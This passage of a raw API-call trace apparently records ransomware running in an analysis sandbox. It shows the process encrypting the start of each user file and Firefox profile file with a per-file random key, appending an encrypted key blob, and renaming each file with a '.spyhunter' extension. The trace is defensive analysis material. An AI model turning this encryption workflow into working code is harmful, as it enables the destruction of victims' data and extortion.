"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t3arcwqvyhfqxy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.291] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T3ARcWqVyHfQXY.m4a") returned 68 [0150.291] StrStrW (lpFirst="T3ARcWqVyHfQXY.m4a", lpSrch=".txt") returned 0x0 [0150.291] GetProcessHeap () returned 0x2c0000 [0150.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.291] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0150.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.292] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0150.292] GetProcessHeap () returned 0x2c0000 [0150.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.292] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.292] WriteFile (in: hFile=0x178, lpBuffer=0x57ed7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x57ed7c*, lpNumberOfBytesWritten=0x57ed3c*=0x4, lpOverlapped=0x0) returned 1 [0150.293] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed3c*=0x30, lpOverlapped=0x0) returned 1 [0150.293] CloseHandle (hObject=0x178) returned 1 [0150.293] GetProcessHeap () returned 0x2c0000 [0150.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.293] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T3ARcWqVyHfQXY.m4a.spyhunter") returned 78 [0150.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T3ARcWqVyHfQXY.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t3arcwqvyhfqxy.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T3ARcWqVyHfQXY.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t3arcwqvyhfqxy.m4a.spyhunter")) returned 1 [0150.294] GetProcessHeap () returned 0x2c0000 [0150.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.294] GetProcessHeap () returned 0x2c0000 [0150.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.294] GetProcessHeap () returned 0x2c0000 [0150.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c811e0 | out: hHeap=0x2c0000) returned 1 [0150.294] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed80 | out: pbBuffer=0x57ed80) returned 1 [0150.294] GetProcessHeap () returned 0x2c0000 [0150.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.294] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed78*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed78*=0x30) returned 1 [0150.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SUA7OE3ZLacZ8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sua7oe3zlacz8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.295] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SUA7OE3ZLacZ8.ots") returned 67 [0150.295] StrStrW (lpFirst="SUA7OE3ZLacZ8.ots", lpSrch=".txt") returned 0x0 [0150.295] GetProcessHeap () returned 0x2c0000 [0150.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.295] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0150.296] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.296] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed3c*=0x2800, lpOverlapped=0x0) returned 1 [0150.296] GetProcessHeap () returned 0x2c0000 [0150.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.296] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.296] WriteFile (in: hFile=0x178, lpBuffer=0x57ed7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x57ed7c*, lpNumberOfBytesWritten=0x57ed3c*=0x4, lpOverlapped=0x0) returned 1 [0150.297] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed3c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed3c*=0x30, lpOverlapped=0x0) returned 1 [0150.297] CloseHandle (hObject=0x178) returned 1 [0150.297] GetProcessHeap () returned 0x2c0000 [0150.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.297] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SUA7OE3ZLacZ8.ots.spyhunter") returned 77 [0150.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SUA7OE3ZLacZ8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sua7oe3zlacz8.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\SUA7OE3ZLacZ8.ots.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sua7oe3zlacz8.ots.spyhunter")) returned 1 [0150.298] GetProcessHeap () returned 0x2c0000 [0150.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.298] GetProcessHeap () returned 0x2c0000 [0150.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.298] GetProcessHeap () returned 0x2c0000 [0150.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08888 | out: hHeap=0x2c0000) returned 1 [0150.298] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed78 | out: pbBuffer=0x57ed78) returned 1 [0150.298] GetProcessHeap () returned 0x2c0000 [0150.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed70*=0x30) returned 1 [0150.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\stuYJpV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\stuyjpv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\stuYJpV.mp3") returned 61 [0150.299] StrStrW (lpFirst="stuYJpV.mp3", lpSrch=".txt") returned 0x0 [0150.299] GetProcessHeap () returned 0x2c0000 [0150.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.299] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ed34*=0x2674, lpOverlapped=0x0) returned 1 [0150.300] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd98c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.300] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2674, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ed34*=0x2674, lpOverlapped=0x0) returned 1 [0150.300] GetProcessHeap () returned 0x2c0000 [0150.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.301] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.301] WriteFile (in: hFile=0x178, lpBuffer=0x57ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x57ed74*, lpNumberOfBytesWritten=0x57ed34*=0x4, lpOverlapped=0x0) returned 1 [0150.301] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed34*=0x30, lpOverlapped=0x0) returned 1 [0150.301] CloseHandle (hObject=0x178) returned 1 [0150.302] GetProcessHeap () returned 0x2c0000 [0150.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0150.302] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\stuYJpV.mp3.spyhunter") returned 71 [0150.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\stuYJpV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\stuyjpv.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\stuYJpV.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\stuyjpv.mp3.spyhunter")) returned 1 [0150.333] GetProcessHeap () returned 0x2c0000 [0150.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0150.333] GetProcessHeap () returned 0x2c0000 [0150.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.333] GetProcessHeap () returned 0x2c0000 [0150.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85870 | out: hHeap=0x2c0000) returned 1 [0150.333] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed78 | out: pbBuffer=0x57ed78) returned 1 [0150.333] GetProcessHeap () returned 0x2c0000 [0150.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.333] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed70*=0x30) returned 1 [0150.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.402] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite") returned 111 [0150.402] StrStrW (lpFirst="webappsstore.sqlite", lpSrch=".txt") returned 0x0 [0150.402] GetProcessHeap () returned 0x2c0000 [0150.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0150.402] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ed34*=0x2800, lpOverlapped=0x0) returned 1 [0150.560] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.560] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ed34*=0x2800, lpOverlapped=0x0) returned 1 [0150.561] GetProcessHeap () returned 0x2c0000 [0150.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0150.561] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.561] WriteFile (in: hFile=0x178, lpBuffer=0x57ed74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x57ed74*, lpNumberOfBytesWritten=0x57ed34*=0x4, lpOverlapped=0x0) returned 1 [0150.561] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed34*=0x30, lpOverlapped=0x0) returned 1 [0150.561] CloseHandle (hObject=0x178) returned 1 [0150.563] GetProcessHeap () returned 0x2c0000 [0150.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.564] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.spyhunter") returned 121 [0150.564] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.spyhunter")) returned 1 [0150.565] GetProcessHeap () returned 0x2c0000 [0150.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.565] GetProcessHeap () returned 0x2c0000 [0150.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.565] GetProcessHeap () returned 0x2c0000 [0150.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0050 | out: hHeap=0x2c0000) returned 1 [0150.565] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed70 | out: pbBuffer=0x57ed70) returned 1 [0150.565] GetProcessHeap () returned 0x2c0000 [0150.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.565] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed68*=0x30) returned 1 [0150.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0150.567] StrStrW (lpFirst="prefs.js", lpSrch=".txt") returned 0x0 [0150.567] GetProcessHeap () returned 0x2c0000 [0150.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.567] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed2c*=0xfde, lpOverlapped=0x0) returned 1 [0150.569] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff022, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.569] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xfde, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed2c*=0xfde, lpOverlapped=0x0) returned 1 [0150.569] GetProcessHeap () returned 0x2c0000 [0150.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.569] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.569] WriteFile (in: hFile=0x178, lpBuffer=0x57ed6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x57ed6c*, lpNumberOfBytesWritten=0x57ed2c*=0x4, lpOverlapped=0x0) returned 1 [0150.569] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed2c*=0x30, lpOverlapped=0x0) returned 1 [0150.570] CloseHandle (hObject=0x178) returned 1 [0150.570] GetProcessHeap () returned 0x2c0000 [0150.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.570] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.spyhunter") returned 110 [0150.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.spyhunter")) returned 1 [0150.571] GetProcessHeap () returned 0x2c0000 [0150.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.571] GetProcessHeap () returned 0x2c0000 [0150.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.571] GetProcessHeap () returned 0x2c0000 [0150.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67bb0 | out: hHeap=0x2c0000) returned 1 [0150.571] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed70 | out: pbBuffer=0x57ed70) returned 1 [0150.571] GetProcessHeap () returned 0x2c0000 [0150.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.571] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed68*=0x30) returned 1 [0150.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0150.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0150.572] StrStrW (lpFirst="pluginreg.dat", lpSrch=".txt") returned 0x0 [0150.572] GetProcessHeap () returned 0x2c0000 [0150.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.572] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57ed2c*=0xe14, lpOverlapped=0x0) returned 1 [0150.607] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff1ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.607] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe14, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57ed2c*=0xe14, lpOverlapped=0x0) returned 1 [0150.607] GetProcessHeap () returned 0x2c0000 [0150.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.607] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.607] WriteFile (in: hFile=0x178, lpBuffer=0x57ed6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x57ed6c*, lpNumberOfBytesWritten=0x57ed2c*=0x4, lpOverlapped=0x0) returned 1 [0150.607] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ed2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ed2c*=0x30, lpOverlapped=0x0) returned 1 [0150.607] CloseHandle (hObject=0x178) returned 1 [0150.607] GetProcessHeap () returned 0x2c0000 [0150.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.607] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.spyhunter") returned 115 [0150.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.spyhunter")) returned 1 [0150.610] GetProcessHeap () returned 0x2c0000 [0150.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.610] GetProcessHeap () returned 0x2c0000 [0150.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0150.610] GetProcessHeap () returned 0x2c0000 [0150.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0e30 | out: hHeap=0x2c0000) returned 1 [0150.610] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ed68 | out: pbBuffer=0x57ed68) returned 1 [0150.610] GetProcessHeap () returned 0x2c0000 [0150.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0150.610] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ed60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ed60*=0x30) returned 1 [0150.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\marionette.log" 